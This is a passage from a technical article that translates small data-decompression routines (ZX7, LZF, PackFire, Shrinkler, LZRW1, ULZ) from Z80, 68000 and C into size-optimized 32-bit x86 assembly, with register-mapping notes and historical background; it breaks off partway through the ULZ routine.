    Designed by Einar Saukas and published in 2012. ZX7 is an optimal LZ77 algorithm for the ZX-Spectrum using a combination of fixed length and variable length Gamma codes for the match length and offset. The following is a translation of the standard Z80 depacker to a 32-bit x86 assembly in 111 bytes.

    Register Mapping
    Z80 x86
    A AL
    B CH
    C CL
    BC CX
    D DH
    E DL
    HL ESI
    DE EDX or EDI
    dzx7_standard:
    _dzx7_standard:
        pushad
        
        ; tested on Windows
        mov    esi, [esp+32+12]     ; hl = source
        mov    edi, [esp+32+ 4]     ; de = destination
        
        mov    al, 0x80             ; ld      a, $80
    dzx7s_copy_byte_loop:
        ; copy literal byte
        movsb                       ; ldi                             
    dzx7s_main_loop:
        call   dzx7s_next_bit       ; call    dzx7s_next_bit
    ; next bit indicates either literal or sequence
        jnc    dzx7s_copy_byte_loop ; jr      nc, dzx7s_copy_byte_loop
    
    ; determine number of bits used for length (Elias gamma coding)
        push   edi                  ; push    de
        mov    ecx, 0               ; ld      bc, 0
        mov    dh, ch               ; ld      d, b
    dzx7s_len_size_loop:
        inc    dh                   ; inc     d
        call   dzx7s_next_bit       ; call    dzx7s_next_bit
        jnc    dzx7s_len_size_loop  ; jr      nc, dzx7s_len_size_loop
    ; determine length
    dzx7s_len_value_loop:
        jc     skip_call
        call   dzx7s_next_bit       ; call    nc, dzx7s_next_bit
    skip_call:
        rcl    cl, 1                ; rl      c
        rcl    ch, 1                ; rl      b
        ; check end marker
        jc     dzx7s_exit           ; jr      c, dzx7s_exit           
        dec    dh                   ; dec     d
        jnz    dzx7s_len_value_loop ; jr      nz, dzx7s_len_value_loop
        ; adjust length
        inc    cx                   ; inc     bc                      
    
    ; determine offset
        ; load offset flag (1 bit) + offset value (7 bits)
        mov    dl, [esi]            ; ld      e, (hl)                 
        inc    esi                  ; inc     hl
        ; opcode for undocumented instruction "SLL E" aka "SLS E"
        shl    dl, 1                ; defb    $cb, $33                
        ; if offset flag is set, load 4 extra bits
        jnc    dzx7s_offset_end     ; jr      nc, dzx7s_offset_end    
        ; bit marker to load 4 bits
        mov    dh, 0x10             ; ld      d, $10                  
    dzx7s_rld_next_bit:
        call   dzx7s_next_bit       ; call    dzx7s_next_bit
        ; insert next bit into D
        rcl    dh, 1                ; rl      d                       
        ; repeat 4 times, until bit marker is out
        jnc    dzx7s_rld_next_bit   ; jr      nc, dzx7s_rld_next_bit  
        ; add 128 to DE
        inc    dh                   ; inc     d 
        ; retrieve fourth bit from D                      
        shr    dh, 1                ; srl	d			
    dzx7s_offset_end:
        ; insert fourth bit into E
        rcr    dl, 1                ; rr      e                       
    
    ; copy previous sequence
        ; store source, restore destination
        xchg   esi, [esp]           ; ex      (sp), hl 
        ; store destination
        push   esi                  ; push    hl                      
        ; HL = destination - offset - 1
        sbb    esi, edx             ; sbc     hl, de                  
        ; DE = destination
        pop    edi                  ; pop     de                      
        rep    movsb                ; ldir
    dzx7s_exit:
        pop    esi                  ; pop     hl             
        jnc    dzx7s_main_loop      ; jr      nc, dzx7s_main_loop
        sub    edi, [esp+32+4]
        mov    [esp+28], edi
        popad
        ret
    dzx7s_next_bit:
        ; check next bit
        add    al, al               ; add     a, a    
        ; no more bits left?
        jnz    exit_get_bit         ; ret     nz      
        ; load another group of 8 bits
        mov    al, [esi]            ; ld      a, (hl) 
        inc    esi                  ; inc     hl
        rcl    al, 1                ; rla
    exit_get_bit:
        ret                         ; ret
    

    The following is a 32-Bit version of a size-optimized 16-bit code implemented by Trixter and Qkumba in 2016. It’s currently 81 bytes.

    zx7_depack:
    _zx7_depack:
        pushad
        mov    edi, [esp+32+ 4] ; output
        mov    esi, [esp+32+12] ; input
        
        call   init_get_bit
        add    al, al           ; check next bit
        jnz    exit_get_bit     ; no more bits left?
        lodsb                   ; load another group of 8 bits
        adc    al, al
    exit_get_bit:
        ret
    init_get_bit:
        pop    ebp
        mov    al, 80h
        xor    ecx, ecx
    copy_byte:
        movsb                    ; copy literal byte
    main_loop:
        call   ebp
        jnc    copy_byte         ; next bit indicates either
                                 ; literal or sequence
    ; determine number of bits used for length (Elias gamma coding)
        xor    ebx, ebx
    len_size_loop:
        inc    ebx
        call   ebp
        jnc    len_size_loop
        jmp    len_value_skip
    ; determine length
    len_value_loop:
        call   ebp
    len_value_skip:
        adc    cx, cx
        jc     zx7_exit       ; check end marker
        
        dec    ebx
        jnz    len_value_loop
        
        inc    ecx            ; adjust length
                              ; determine offset
        mov    bl, [esi]      ; load offset flag (1 bit) +
                              ; offset value (7 bits)
        inc    esi
        stc
        adc    bl, bl
        jnc    offset_end     ; if offset flag is set, load
                              ; 4 extra bits
        mov    bh, 10h        ; bit marker to load 4 bits
    rld_next_bit:
        call   ebp
        adc    bh, bh         ; insert next bit into D
        jnc    rld_next_bit   ; repeat 4 times, until bit
                              ; marker is out
        inc    bh             ; add 256 to DE
    offset_end:
        shr    ebx, 1         ; insert fourth bit into E
        push   esi
        mov    esi, edi
        sbb    esi, ebx       ; destination = destination - offset - 1
        rep    movsb
        pop    esi            ; restore source address
        jmp    main_loop
    zx7_exit:
        sub    edi, [esp+32+4]
        mov    [esp+28], edi
        popad
        ret
    

    10.3 ZX7 Mini

    Designed by Antonio Villena and published in 2019. This version uses less code at the expense of the compression ratio. Nevertheless, it’s a great example to demonstrate the conversion between Z80 and x86.

    Register Mapping
    Z80 x86
    A AL
    BC ECX
    D DH
    E DL
    HL ESI
    DE EDI
    zx7_depack:
    _zx7_depack:
        pushad
    
        mov    esi, [esp+32+4] ; esi = in
        mov    edi, [esp+32+8] ; edi = out
    
        call   init_getbit
    getbit:  
        add    al, al          ; add     a, a
        jnz    exit_getbit     ; ret     nz
        lodsb                  ; ld      a, (hl)
                               ; inc     hl
        adc    al, al          ; adc     a, a
    exit_getbit:
        ret
    init_getbit:
        pop    ebp             ;
        mov    al, 80h         ; ld      a, $80
    copyby:  
        movsb                  ; ldi
    mainlo:
        call   ebp             ; call    getbit
        jnc    copyby          ; jr      nc, copyby
        push   1               ; ld      bc, 1
        pop    ecx
    lenval:  
        call   ebp             ; call    getbit
        rcl    cl, 1           ; rl      c
        jc     exit_depack     ; ret     c
        call   ebp             ; call    getbit
        jnc    lenval          ; jr      nc, lenval
        push   esi             ; push    hl
        movzx  edx, byte[esi]  ; ld      l, (hl)
        mov    esi, edi
        sbb    esi, edx        ; sbc     hl, de
        rep    movsb           ; ldir
        pop    esi             ; pop     hl
        inc    esi             ; inc     hl
        jmp    mainlo          ; jr      mainlo
    exit_depack:
        sub    edi, [esp+32+8] ;
        mov    [esp+28], edi
        popad
        ret
    

    10.4 LZF

    LibLZF is designed by Marc Lehmann. Ilya “encode” Muravyov implemented a version that doesn’t include headers or checksums in 2013. The x86 assembly is a translation of a size-optimized version by introspec.

    lzf_depack:    
    _lzf_depack:    
        pushad
        mov    edi, [esp+32+4]   ; edi = outbuf
        mov    esi, [esp+32+8]   ; esi = inbuf
        
        xor    ecx, ecx          ; ld b,0 
        jmp    MainLoop          ; jr MainLoop  ; all copying is done by LDIR; B needs to be zero
    ProcessMatches:        
        push   eax               ; exa
        lodsb                    ; ld a,(hl)
                                 ; inc hl
                                 ; rlca  
                                 ; rlca  
        rol    al, 3             ; rlca 
        inc    al                ; inc a
        and    al, 00000111b     ; and %00000111 
        jnz    CopyingMatch      ; jr nz,CopyingMatch
    LongMatch:        
        lodsb                    ; ld a,(hl) 
        add    al, 8             ; add 8
                                 ; inc hl ; len == 9 means an extra len byte needs to be read
                                 ; jr nc,CopyingMatch 
                                 ; inc b
        adc    ch, ch
    CopyingMatch:        
        mov    cl, al            ; ld c,a 
        inc    ecx               ; inc bc 
        pop    eax               ; exa 
        cmp    al, 20h           ; token == #20 suggests a possibility of the end marker (#20,#00)
        jnz    NotTheEnd         ; jr nz,NotTheEnd 
        xor    al, al            ; xor a 
        cmp    [esi], al         ; cp (hl) 
        jz     exit              ; ret z   ; is it the end marker? return if it is
    NotTheEnd:
        and    al, 1fh           ; and %00011111 ; A' = high(offset); also, reset flag C for SBC below
        push   esi               ; push hl 
        movzx  edx, byte[esi]    ; ld l,(hl)  
        mov    dh, al            ; ld h,a                ; HL = offset
        movsx  edx, dx           ; 
                                 ; push de
        mov    esi, edi          ; ex de,hl              ; DE = offset, HL = dest
        sbb    esi, edx          ; sbc hl,de             ; HL = dest-offset
                                 ; pop de
        rep    movsb             ; ldir
        pop    esi               ; pop hl 
        inc    esi               ; inc hl
    MainLoop:        
        mov    al, [esi]         ; ld a,(hl) 
        cmp    al, 20h           ; cp #20  
        jnc    ProcessMatches    ; jr nc,ProcessMatches  ; tokens "000lllll" mean "copy lllll+1 literals"
        inc    al                ; inc a 
        mov    cl, al            ; ld c,a 
        inc    esi               ; inc hl 
        rep    movsb             ; ldir   ; actual copying of the literals
        jmp    MainLoop          ; jr MainLoop
    exit:
        sub    edi, [esp+32+4]
        mov    [esp+28], edi
        popad
        ret
    

    11. Motorola 68000 (68K)

    “Motorola, with its superior technology, lost the single most important design contest of the last 50 years” Walden C. Rhines

    A revolutionary CPU released in 1979 that includes eight 32-Bit general-purpose data registers (D0-D7), and eight address registers (A0-A7) used for function arguments and stack pointer. The 68K was used in the Commodore Amiga, the Atari ST, the Macintosh, including various fourth-generation gaming consoles like the Sega Megadrive, and arcade systems like Namco System 2. The 68K was more compelling than the Z80, 6502, 8088, and 8086, so why did it lose to Intel in the home computer war of the 1980s? A history of the Amiga, part 10: The downfall of Commodore offers some plausible answers. IBM choosing Control Program/Monitor by Gary Kildall for its 1980 PC operating system is also likely a factor.

    The following table lists some 68K instructions and the x86 instructions used to replace them.

    68K x86 Description
    move mov Copy data from source to destination
    add add Add binary.
    addx adc Add with borrow/carry.
    sub sub Subtract binary.
    subx sbb Subtract with borrow/carry.
    rts ret Return from subroutine.
    dbf/dbt loopne/loope Test condition, decrement, and branch.
    bsr call Branch to subroutine
    bcs:bcc jc:jnc Branch/Jump if carry set. Jump if carry clear.
    beq:bne je:jne Branch/Jump if equal. Not equal.
    ble jle Branch/Jump if less than or equal.
    bra jmp Branch always.
    lsr shr Logical shift right.
    lsl shl Logical shift left.
    bhs jae Branch on higher than or same.
    bpl jns Branch on higher than or same.
    bmi js Branch on minus. Jump if signed.
    tst test Test bit zero of a register.
    exg xchg Exchange registers.

    11.1 PackFire

    Designed by neural and published in 2010, PackFire comprises two algorithms tailored for demos targeting the Atari ST. The first borrows ideas from Exomizer and is suitable for small files not exceeding ~40KB. The other borrows ideas from LZMA, which is more suited to compressing larger files. The LZMA-variant requires 16KB of RAM for the range decoder, which isn’t a problem for the Atari ST with between 512-1024KB of RAM available. However, translating code written for the 68K to x86 isn’t easy because the x86 is a less advanced architecture. Since being released, badc0de has published decoders for a variety of other architectures, including 32-Bit ARM. The following is the Exomizer-style decoder for files not exceeding ~40KB, which probably isn’t very useful unless you write demos for retro hardware.

    packfire_depack:    
    _packfire_depack:    
        pushad
        
        mov    ebp, [esp+32+4]   ; eax = inbuf (a0)
        mov    edi, [esp+32+8]   ; edi = outbuf (a1)
        
        lea    esi, [ebp+26]     ; lea     26(a0),a2
        lodsb                    ; move.b  (a2)+,d7
    lit_copy:               
        movsb                    ; move.b  (a2)+,(a1)+
    main_loop:              
        call   get_bit           ; bsr.b   get_bit
        jc     lit_copy          ; bcs.b   lit_copy
        
        cdq                      ; moveq   #-1,d3
        dec    edx
    get_index:              
        inc    edx               ; addq.l  #1,d3
        call   get_bit           ; bsr.b   get_bit
        jnc    get_index         ; bcc.b   get_index
        
        cmp    edx, 0x10         ; cmp.w   #$10,d3
        je     depack_stop       ; beq.b   depack_stop
        
        call   get_pair          ; bsr.b   get_pair
        push   edx               ; move.w  d3,d6 ; save it for the copy
        cmp    edx, 2            ; cmp.w   #2,d3
        jle    out_of_range      ; ble.b   out_of_range
        
        cdq                      ; moveq   #0,d3
    out_of_range:
                                 ; move.b  table_len(pc,d3.w),d1
                                 ; move.b  table_dist(pc,d3.w),d0
        ; code without tables
        push   4                 ; d1 = 4
        pop    ecx
        push   16                ; d0 = 16
        pop    ebx
        dec    edx               ; d3--
        js     L0
        
        dec    edx
        mov    cl, 2             ; d1 = 2
        mov    bl, 48            ; d0 = 48
        js     L0
        
        mov    cl, 4             ; d1 = 4
        mov    bl, 32            ; d0 = 32
    L0:
        call   get_bits          ; bsr.b   get_bits
        call   get_pair          ; bsr.b   get_pair
        pop    ecx
        push   esi
        mov    esi, edi          ; move.l  a1,a3
        sub    esi, edx          ; sub.l   d3,a3
    copy_bytes:             
        rep    movsb             ; move.b  (a3)+,(a1)+
                                 ; subq.w  #1,d6
                                 ; bne.b   copy_bytes
        pop    esi
        jmp    main_loop         ; bra.b   main_loop
    get_pair:
        pushad
        cdq                      ; sub.l   a6,a6
                                 ; moveq   #$f,d2
    calc_len_dist:          
        mov    ebx, edx          ; move.w  a6,d0
        and    ebx, 15           ; and.w   d2,d0
        jne    node              ; bne.b   node
        push   1
        pop    edi               ; moveq   #1,d5
    node:                   
        mov    eax, edx          ; move.w  a6,d4
        shr    eax, 1            ; lsr.w   #1,d4    
        mov    cl, [ebp+eax]     ; move.b  (a0,d4.w),d1
        push   1                 ; moveq   #1,d4
        pop    eax
        and    ebx, eax          ; and.w   d4,d0
        je     nibble            ; beq.b   nibble
        shr    ecx, 4            ; lsr.b   #4,d1
    nibble:                 
        mov    ebx, edi          ; move.w  d5,d0
        and    ecx, 15           ; and.w   d2,d1
        shl    eax, cl           ; lsl.l   d1,d4
        add    edi, eax          ; add.l   d4,d5
        inc    edx               ; addq.w  #1,a6
    
        ; dbf  d3,calc_len_dist
        dec    dword[esp+pushad_t.edx] 
        jns    calc_len_dist
        ; save d0 and d1
        mov    [esp+pushad_t.ebx], ebx
        mov    [esp+pushad_t.ecx], ecx
        popad
    get_bits:               
        cdq                      ; moveq   #0,d3
    getting_bits:           
        dec    ecx               ; subq.b  #1,d1
        jns    cont_get_bit      ; bhs.b   cont_get_bit
        add    edx, ebx          ; add.w   d0,d3
        ret
    depack_stop:
        sub    edi, [esp+32+8]   ; 
        mov    [esp+pushad_t.eax], edi
        popad
        ret                      ; rts
    cont_get_bit:           
        call   get_bit           ; bsr.b   get_bit
        adc    edx, edx          ; addx.l  d3,d3
        jmp    getting_bits      ; bra.b   getting_bits
    get_bit:                
        add    al, al            ; add.b   d7,d7
        jne    byte_done         ; bne.b   byte_done
        lodsb                    ; move.b  (a2)+,d7
        adc    al, al            ; addx.b  d7,d7
    byte_done:              
        ret                      ; rts
    

    11.2 Shrinkler

    Designed by Aske Simon Christensen (Blueberry/Loonies) and published in 1999. It stores compressed data in Big-Endian 32-bit words, and the x86 translation must use BSWAP before reading bits of the stream. The compressor is open source and could be updated to use Little-Endian format instead. Christensen is also a co-author of the Crinkler executable compressor along with Rune Stubbe (Mentor/TBC) that’s popular for 4K intros on Windows.

    The following is a description from Blueberry:

    Shrinkler is optimized for target sizes around 4k (while still being good for 64k), which strongly favors decompression code size. It tries to achieve the best size for this target, somewhat at the expense of decompression speed. At the same time, it is intended to be useful on Amiga 500, which means that decompression speed should still be reasonable, and decompression memory usage should be small. Shrinkler decrunches a 64k intro in typically less than half a minute on Amiga 500, which is an acceptable wait time for starting an intro. And the memory needed for the probabilities fits within the default stack size of 4k on Amiga.

    Shrinkler also has special tweaks gearing it towards 16-bit oriented data (as all 68000 instructions are a multiple of 16 bits). Specifically, it keeps separate literal context groups for even and odd bytes, since these distributions are usually very different for Amiga data. Same thing for the flag indicating whether the a literal or a match is coming up. This gives a great boost for Amiga intros, but it has no benefit for data that has arbitrary alignment. It usually doesn’t hurt either, except for the slight cost in decompression code size.

    The following is a translation of the 68K assembly to x86, with help from Blueberry.

        %define INIT_ONE_PROB       0x8000
        %define ADJUST_SHIFT        4
        %define SINGLE_BIT_CONTEXTS 1
        %define NUM_CONTEXTS        1536
    
        struc pushad_t
          .edi resd 1
          .esi resd 1    
          .ebp resd 1    
          .esp resd 1     
          .ebx resd 1
          .edx resd 1
          .ecx resd 1
          .eax resd 1
        endstruc
        
        ; temporary variables for range decoder
        %define d2   4*0
        %define d3   4*1
        %define d4   4*2
        %define prob 4*3
        
        %ifndef BIN
          global ShrinklerDecompress
          global _ShrinklerDecompress
        %endif
        
    ShrinklerDecompress:
    _ShrinklerDecompress:
        ; save d2-d7/a4-a6 in -(a7) the stack
        pushad                   ; movem.l  d2-d7/a4-a6,-(a7)
    
        ; esi = inbuf    
        mov    esi, [esp+32+4]   ; move.l a0,a4
        ; edi = outbuf
        mov    edi, [esp+32+8]   ; move.l a1,a5
                                 ; move.l a1,a6
        ; allocate local memory for range decoder
        sub    esp, 4096
        test   [esp], esp        ; stack probe
        mov    ebp, esp          ; ebp = stack pointer
        
        ; Init range decoder state
        mov    dword[ebp+d2], 0  ; moveq.l  #0,d2
        mov    dword[ebp+d3], 1  ; moveq.l  #1,d3
        mov    dword[ebp+d4], 1  ; moveq.l  #1,d4
        ror    dword[ebp+d4], 1  ; ror.l  #1,d4
    
        ; Init probabilities
        mov    edx, NUM_CONTEXTS ; move.l #NUM_CONTEXTS, d6
    .init:  
        ; move.w  #INIT_ONE_PROB,-(a7)
        mov    word[prob+ebp+edx*2-2], INIT_ONE_PROB  
        sub    dx, 1             ; subq.w #1,d6                        
        jne    .init             ; bne.b  .init
        ; D6 = 0
    .lit:
        ; Literal
        add    dl, 1             ; addq.b #1,d6
    .getlit:
        call   GetBit            ; bsr.b  GetBit
        adc    dl, dl            ; addx.b d6,d6
        jnc    .getlit           ; bcc.b  .getlit
      
        mov    [edi], dl         ; move.b d6,(a5)+
        inc    edi
                                 ; bsr.b  ReportProgress
    .switch:
        ; After literal
        call   GetKind           ; bsr.b  GetKind
        jnc    .lit              ; bcc.b  .lit
        ; Reference
        mov    edx, -1           ; moveq.l  #-1,d6
        call   GetBit            ; bsr.b  GetBit
        jnc    .readoffset       ; bcc.b  .readoffset
    .readlength:
        mov    edx, 4            ; moveq.l  #4,d6
        call   GetNumber         ; bsr.b  GetNumber
    .copyloop:
        mov    al, [edi + ebx]   ; move.b (a5,d5.l),(a5)+
        stosb
        sub    ecx, 1            ; subq.l #1,d7
        jne    .copyloop         ; bne.b  .copyloop
                                 ; bsr.b  ReportProgress
        ; After reference
        call   GetKind           ; bsr.b  GetKind
        jnc    .lit              ; bcc.b  .lit
    .readoffset:
        mov    edx, 3            ; moveq.l  #3,d6
        call   GetNumber         ; bsr.b  GetNumber
        mov    ebx, 2            ; moveq.l  #2,d5
        sub    ebx, ecx          ; sub.l  d7,d5
        jne    .readlength       ; bne.b  .readlength
    
        add    esp, 4096         ; lea.l  NUM_CONTEXTS*2(a7),a7
        sub    edi, [esp+32+8]
        mov    [esp+pushad_t.eax], edi
        popad                    ; movem.l  (a7)+,d2-d7/a4-a6
        ret                      ; rts
    
    ReportProgress:
        ; move.l  a2,d0
        ; beq.b .nocallback
        ; move.l  a5,d0
        ; sub.l a6,d0
        ; move.l  a3,a0
        ; jsr (a2)
    .nocallback:
        ; rts
    
    GetKind:
        ; Use parity as context
                                 ; move.l a5,d1
        mov    edx, 1            ; moveq.l  #1,d6
        and    edx, edi          ; and.l  d1,d6
        shl    dx, 8             ; lsl.w  #8,d6
        jmp    GetBit            ; bra.b  GetBit
    
    GetNumber:
        ; EDX = Number context
        ; Out: Number in ECX
        shl    dx, 8             ; lsl.w  #8,d6
    .numberloop:
        add    dl, 2             ; addq.b #2,d6
        call   GetBit            ; bsr.b  GetBit
        jc     .numberloop       ; bcs.b  .numberloop
        mov    ecx, 1            ; moveq.l  #1,d7
        sub    dl, 1             ; subq.b #1,d6
    .bitsloop:
        call   GetBit            ; bsr.b  GetBit
        adc    ecx, ecx          ; addx.l d7,d7
        sub    dl, 2             ; subq.b #2,d6
        jnc    .bitsloop         ; bcc.b  .bitsloop
        ret                      ; rts
    
        ; EDX = Bit context
    
        ; d2 = Range value
        ; d3 = Interval size
        ; d4 = Input bit buffer
    
        ; Out: Bit in C and X
    readbit:
        mov    eax, [ebp+d4]
        add    eax, eax          ; add.l  d4,d4
        jne    nonewword         ; bne.b  nonewword
        lodsd                    ; move.l (a4)+,d4
        bswap  eax               ; data is stored in big-endian format
        adc    eax, eax          ; addx.l d4,d4
    nonewword:
        mov    [ebp+d4], eax 
        mov    [esp+pushad_t.esi], esi
        adc    bx, bx            ; addx.w d2,d2
        add    cx, cx            ; add.w  d3,d3
        jmp    check_interval
    GetBit:
        pushad
        mov    ebx, [ebp+d2]
        mov    ecx, [ebp+d3]
    check_interval:
        test   cx, cx            ; tst.w  d3
        jns    readbit           ; bpl.b  readbit
    
        ; lea.l 4+SINGLE_BIT_CONTEXTS*2(a7,d6.l),a1
        ; add.l d6,a1
        lea    edi, [ebp+prob+2*edx+SINGLE_BIT_CONTEXTS*2]      
        movzx  eax, word[edi]    ; move.w (a1),d1
        ; D1/EAX = One prob
    
        shr    ax, ADJUST_SHIFT  ; lsr.w  #ADJUST_SHIFT,d1
        sub    [edi], ax         ; sub.w  d1,(a1)
        add    ax, [edi]         ; add.w  (a1),d1
        
        mul    cx                ; mulu.w d3,d1
                                 ; swap.w d1
    
        sub    bx, dx            ; sub.w  d1,d2
        jb     .one              ; blo.b  .one
    .zero:
        ; oneprob = oneprob * (1 - adjust) = oneprob - oneprob * adjust
        sub    cx, dx            ; sub.w  d1,d3
        ; 0 in C and X
                                 ; rts
        jmp    exit_get_bit
    .one:
        ; onebrob = 1 - (1 - oneprob) * (1 - adjust) = oneprob - oneprob * adjust + adjust
        ; add.w #$ffff>>ADJUST_SHIFT,(a1)
        add    word[edi], 0xFFFF >> ADJUST_SHIFT 
        mov    cx, dx            ; move.w d1,d3
        add    bx, dx            ; add.w  d1,d2
        ; 1 in C and X
    exit_get_bit:
        mov    word[ebp+d2], bx
        mov    word[ebp+d3], cx
        popad
        ret                      ; rts
    

    The following is my own attempt to implement a size-optimized version of the same depacker in x86 assembly. However, there’s likely room for improvement here, and this code will be updated later.

        %define INIT_ONE_PROB       0x8000
        %define ADJUST_SHIFT        4
        %define SINGLE_BIT_CONTEXTS 1
        %define NUM_CONTEXTS        1536
    
        struc pushad_t
          .edi resd 1
          .esi resd 1
          .ebp resd 1
          .esp resd 1
          .ebx resd 1
          .edx resd 1
          .ecx resd 1
          .eax resd 1
        endstruc
    
        struc shrinkler_ctx
          .esp      resd 1      ; original value of esp before allocation
          .range    resd 1      ; range value
          .ofs      resd 1
          .interval resd 1      ; interval size
        endstruc
    
        bits 32
    
        %ifndef BIN
          global shrinkler_depackx
          global _shrinkler_depackx
        %endif
    
    shrinkler_depackx:
    _shrinkler_depackx:
        pushad
        mov    ebx, [esp+32+4]   ; edi = outbuf
        mov    esi, [esp+32+8]   ; esi = inbuf
    
        mov    eax, esp
        xor    ecx, ecx          ; ecx = 4096
        mov    ch, 10h
        sub    esp, ecx          ; subtract 1 page
        test   [esp], esp        ; stack probe
    
        mov    edi, esp
        stosd                    ; save original value of esp
        cdq
        xchg   eax, edx
        stosd                    ; range value = 0
        stosd                    ; offset = 0
        inc    eax
        stosd                    ; interval length = 1
    
        call   init_get_bit
    GetBit:
        pushad
        mov    ebp, [ebx+shrinkler_ctx.range   ]
        mov    ecx, [ebx+shrinkler_ctx.interval]
        jmp    check_interval
    readbit:
        add    al, al
        jne    nonewword
        lodsb
        adc    al, al
    nonewword:
        mov    [esp+pushad_t.eax], eax
        mov    [esp+pushad_t.esi], esi
        adc    ebp, ebp
        add    ecx, ecx
    check_interval:
        test   cx, cx
        jns    readbit
    
        lea    edi, [shrinkler_ctx_size + ebx + 2*edx + SINGLE_BIT_CONTEXTS*2]
        mov    ax, word[edi]
    
        shr    eax, ADJUST_SHIFT
        sub    [edi], ax
        add    ax, [edi]
    
        cdq
        mul    cx
    
        sub    ebp, edx
        jc    .one
    .zero:
        ; oneprob = oneprob * (1 - adjust) = oneprob - oneprob * adjust
        sub    ecx, edx
        ; 0 in C and X
        jmp    exit_getbit
    .one:
        ; onebrob = 1 - (1 - oneprob) * (1 - adjust) = oneprob - oneprob * adjust + adjust
        add    word[edi], (0xFFFF >> ADJUST_SHIFT)
        xchg   edx, ecx
        add    ebp, ecx
        ; 1 in C and X
    exit_getbit:
        mov    [ebx+shrinkler_ctx.range   ], ebp
        mov    [ebx+shrinkler_ctx.interval], ecx
        popad
        ret
    GetKind:
        ; Use parity as context
        mov    edx, edi
        and    edx, 1
        shl    edx, 8
        jmp    ebp
    GetNumber:
        cdq
        adc    dh, 3
    .numberloop:
        inc    edx
        inc    edx
        call   ebp
        jc    .numberloop
        push   1
        pop    ecx
        dec    edx
    .bitsloop:
        call   ebp
        adc    ecx, ecx
        sub    dl, 2
        jnc   .bitsloop
        ret
    
    init_get_bit:
        pop    ebp               ; ebp = GetBit
    
        ; Init probabilities
        mov    ch, NUM_CONTEXTS >> 8
        xor    eax, eax
        mov    ah, 1<<7
        rep    stosw
        xchg   al, ah
    
        mov    edi, ebx
        mov    ebx, esp
    
        ; edx = 0
        cdq
    .lit:
        ; Literal
        inc    edx
    .getlit:
        call   ebp
        adc    dl, dl
        jnc    .getlit
    
        mov    [edi], dl
        inc    edi
    .switch:
        ; After literal
        call   GetKind
        jnc    .lit
    
        ; Reference
        cdq
        dec    edx
        call   ebp
        jnc    .readoffset
    .readlength:
        clc
        call   GetNumber
        push   esi
        mov    esi, edi
        add    esi, dword[ebx+shrinkler_ctx.ofs]
        rep    movsb
        pop    esi
    
        ; After reference
        call   GetKind
        jnc   .lit
    .readoffset:
        stc
        call   GetNumber
        neg    ecx
        inc    ecx
        inc    ecx
        mov    [ebx+shrinkler_ctx.ofs], ecx
        jne   .readlength
    
        ; return depacked length
        mov    esp, [ebx+shrinkler_ctx.esp]
        sub    edi, [esp+32+4]
        mov    [esp+pushad_t.eax], edi
        popad
        ret
    

    12. C/x86 assembly

    The following algorithms were translated from C to x86 assembly or were already implemented in x86 assembly and optimized for size.

    12.1 Lempel-Ziv Ross Williams (LZRW)

    Designed by Ross Williams and described in An Extremely Fast Ziv-Lempel Data Compression Algorithm published in 1991. The compression ratio is only slightly worse than LZ77 but is much faster at compression.

    lzrw1_depack:
    _lzrw1_depack:
        pushad
        lea    esi, [esp+32+4]
        lodsd
        xchg   edi, eax        ; edi = outbuf
        lodsd
        xchg   ebp, eax        ; ebp = inlen
        lodsd
        xchg   esi, eax        ; esi = inbuf
        add    ebp, esi        ; ebp = inbuf + inlen
    L0:
        push   16 + 1          ; bits = 16
        pop    edx
        lodsw                  ; ctrl = *in++, ctrl |= (*in++) << 8
        xchg   ebx, eax        
    L1:
        ; while(in != end) {
        cmp    esi, ebp
        je     L4
        ; if(--bits == 0) goto L0
        dec    edx
        jz     L0
    L2:
        ; if(ctrl & 1) {
        shr    ebx, 1
        jc     L3
        movsb                  ; *out++ = *in++;
        jmp    L1
    L3:
        lodsb                  ; ofs = (*in & 0xF0) << 4
        aam    16
        cwde
        movzx  ecx, al
        inc    ecx
        lodsb                  ; ofs |= *in++ & 0xFF;
        push   esi             ; save pointer to in
        mov    esi, edi        ; ptr  = out - ofs;
        sub    esi, eax
        rep    movsb           ; while(len--) *out++ = *ptr++;
        pop    esi             ; restore pointer to in
        jmp    L1
    L4:
        sub    edi, [esp+32+4] ; edi = out - outbuf
        mov    [esp+28], edi   ; esp+_eax = edi
        popad
        ret
    

    12.2 Ultra-fast LZ (ULZ)

    Ultra-fast LZ was first published by Ilya “encode” Muravyov in 2010 and then appears to have been open sourced in 2019. The following code is a straightforward translation of the C decoder to x86 assembly.

    static uint32_t add_mod(uint32_t x, uint8_t** p);
    
    uint32_t ulz_depack(
      void *outbuf,
      uint32_t inlen,
      const void *inbuf) 
    {
        uint8_t  *ptr, *in, *end, *out;
        uint32_t dist, len;
        uint8_t  token;
    
        out = (uint8_t*)outbuf;
        in  = (uint8_t*)inbuf;
        end = in + inlen;
        
        while(in < end) {
          token = *in++;
          if(token >= 32) {
            len = token >> 5;
            if(len == 7) 
              len = add_mod(len, &in);
            while(len--) *out++ = *in++;
            if(in >= end) break;
          }
          len = (token & 15) + 4;
          if(len == (15 + 4)) 
            len = add_mod(len, &in);
          dist = ((token & 16) << 12) + *(uint16_t*)in;
          in += 2;
          ptr = out - dist;
          while(len--) *out++ = *ptr++;
        }
        return (uint32_t)(out - (uint8_t*)outbuf);
    }
    
    static uint32_t add_mod(uint32_t x, uint8_t** p) {
        uint8_t c, i;
        
        for(i=0; i<=21; i+=7) {
          c = *(*p)++;
          x += (c << i);
          if(c < 128) break;
        }
        return x;
    }
    
    ulz_depack:
    _ulz_depack:
        pushad
        lea    esi, [esp+32+4]
        lodsd
        xchg   edi, eax          ; edi = outbuf
        lodsd
        xchg   ebx, eax
        lodsd
        xchg   esi, eax          ; esi = inbuf
        add    ebx, esi          ; ebx += inbuf
    ulz_main:
        xor    ecx, ecx
        mul    ecx
        ; while (in < end) {
        cmp    esi, ebx
        jnb    ulz_exit
        ; token = *in++;
        lodsb
        ; if(token >= 32) {
        cmp    al, 32
        jb     ulz_copy2
        ; len = token >> 5
        mov    cl, al
        shr    cl, 5
        ; if(len == 7)
        cmp    cl, 7
        jne    ulz_copy1
        ; len = add_mod(len, &in);
        call   add_mod
    ulz_copy1:
        ; while(len--) *out++ = *in++;
        rep    movsb
        ; if(in >= end) break;
        cmp    esi, ebx
        jae    ulz_exit
    ulz_copy2:
        ; len = (token & 15) + 4;
        mov    cl, al
        and    cl, 15
        add    cl, 4
        ; if(len == (15 + 4))
        cmp    cl, 15 + 4
        jne    ulz_copy3
        ; len = add_mod(len, &in);
        call   add_mod
    ulz_copy3:
        ; dist = ((token & 16) << 12) + *(uint16_t*)in;
        and    al, 16
        shl    eax, 12
        xchg   eax, edx
        ; eax = *(uint16_t*)in;
        ; in += 2;
        lodsw
        add    edx, eax
